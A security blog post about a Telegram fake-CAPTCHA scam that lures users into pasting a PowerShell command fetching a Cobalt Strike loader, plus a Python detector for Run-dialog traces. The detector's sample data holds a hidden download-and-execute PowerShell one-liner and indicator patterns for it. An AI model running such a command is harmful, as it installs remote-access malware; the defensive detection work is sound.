A new scam campaign has been detected that uses a fake CAPTCHA trick. Against the backdrop of Ross Ulbricht's release, attackers lure victims interested in the news of his pardon by Donald Trump to a fraudulent Telegram channel. In the end, the victims run a PowerShell script that downloads malware onto their own device.
Telegram Captcha Exploits PowerShell to Spread Malware
Cybercriminals have upped their game again, now using Telegram as a delivery mechanism for malware under the guise of a CAPTCHA verification system. Leveraging the news about Ross Ulbricht, the infamous Silk Road creator, they lure unsuspecting users into running malicious PowerShell scripts.
Ross Ulbricht, the guy who ran Silk Road (a dark web marketplace for all things illegal), was sentenced to life in 2015, which caused mixed reactions among the public. Former President Trump added fuel by hinting at a pardon, which he finally granted yesterday.
Threat actors seized this news to create fake “official” Ulbricht accounts on X (formerly Twitter), directing curious followers to malicious Telegram channels. On these Telegram channels, users are greeted with a “Safeguard” identity verification aka CAPTCHA. Sounds legit, right?
Except this “verification” process ends with a malicious twist. Users are tricked into running PowerShell commands under the pretense of proving they’re not bots. Here’s the kicker: instead of validating your humanity, the commands download and execute malware.
How the Scam Works
This is not a new scam method, and I have described it several times before. The only difference is that instead of fake websites, a Telegram channel is used. The attack can be divided into 3 parts. The fake verification starts with a mini app that copies a PowerShell command to your clipboard.
Next, users are instructed to paste and execute the command in the Windows Run dialog. The PowerShell command downloads a ZIP file from “http://openline[.]cyou”. Inside, there’s an executable named “identity-helper.exe”, flagged by VirusTotal as a possible Cobalt Strike loader.
Cobalt Strike is a legitimate penetration testing tool often abused by hackers. Once deployed, it provides remote access to compromised systems and their networks. Infections like this frequently pave the way for ransomware or data theft. So, running that PowerShell command is basically handing your computer to the bad guys with a bow on top.
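Because the pasted command goes through the Windows Run dialog, it leaves a trace in the RunMRU registry key and spawns PowerShell as a child of explorer.exe. The script below is an added example (not from the original post) that triages a RunMRU export for exactly that pattern: a PowerShell one-liner that fetches a download and stages or launches a payload. The indicator patterns, the sample export, and the placeholder host example.invalid are assumptions made for this example.

```python
import re

# Indicator patterns for a clipboard-pasted PowerShell "verification" one-liner;
# they are illustrative choices for this example, not taken from the post.
DOWNLOAD = [r"\biwr\b", r"invoke-webrequest", r"downloadfile", r"downloadstring",
            r"net\.webclient", r"start-bitstransfer", r"\bcurl\b"]
STAGE = [r"expand-archive", r"\.zip\b", r"\.exe\b", r"start-process", r"\biex\b"]
EVASION = [r"-w(indowstyle)?\s+hidden", r"-nop(rofile)?\b", r"-e(xecutionpolicy|p)\s+bypass"]
URL = r"https?://[^\s\"']+"

def score_command(cmdline):
    """Return (score, indicators) for one command line; (0, []) means clean."""
    text = cmdline.lower()
    hits = ["powershell"] if re.search(r"\b(powershell|pwsh)(\.exe)?\b", text) else []
    for name, patterns in (("download", DOWNLOAD), ("stage", STAGE), ("evasion", EVASION)):
        if any(re.search(p, text) for p in patterns):
            hits.append(name)
    url = re.search(URL, text)
    if url:
        hits.append("url:" + url.group(0))
    return len(hits), hits

def is_clickfix_like(cmdline, parent_image=None):
    """True for a PowerShell download cradle that also stages a payload or was
    typed into the Run dialog (its child processes are spawned by explorer.exe)."""
    _, hits = score_command(cmdline)
    from_run = bool(parent_image) and parent_image.lower().endswith("explorer.exe")
    return "powershell" in hits and "download" in hits and ("stage" in hits or from_run)

def triage_runmru(runmru):
    """Triage an export of HKCU\\...\\Explorer\\RunMRU in MRUList order (most
    recent first); each value is the typed command plus a literal '\\1' suffix."""
    flagged = []
    for key in runmru.get("MRUList", ""):
        cmd = runmru.get(key, "").removesuffix("\\1")  # Python 3.9+
        if is_clickfix_like(cmd, parent_image=r"C:\Windows\explorer.exe"):
            flagged.append((key, cmd))
    return flagged

# Constructed RunMRU export: two benign entries and one pasted "captcha" one-liner
# (example.invalid is a placeholder for the download host named in the post).
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "powershell -w hidden -c \"iwr http://example.invalid/v.zip -OutFile $env:TEMP\\v.zip; "
         "Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v; & $env:TEMP\\v\\identity-helper.exe\"\\1",
}
```

Run `triage_runmru(SAMPLE_RUNMRU)` to get the flagged entries; the same `is_clickfix_like` check can be applied to process-creation events by passing the parent image of each powershell.exe launch.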
Although this is an obvious ploy from a technical standpoint, average users still fall for it, which keeps the scheme in demand among criminals. To protect yourself, remember one thing – no captcha requires you to paste anything into PowerShell. If you are asked to paste something in, it is a scam.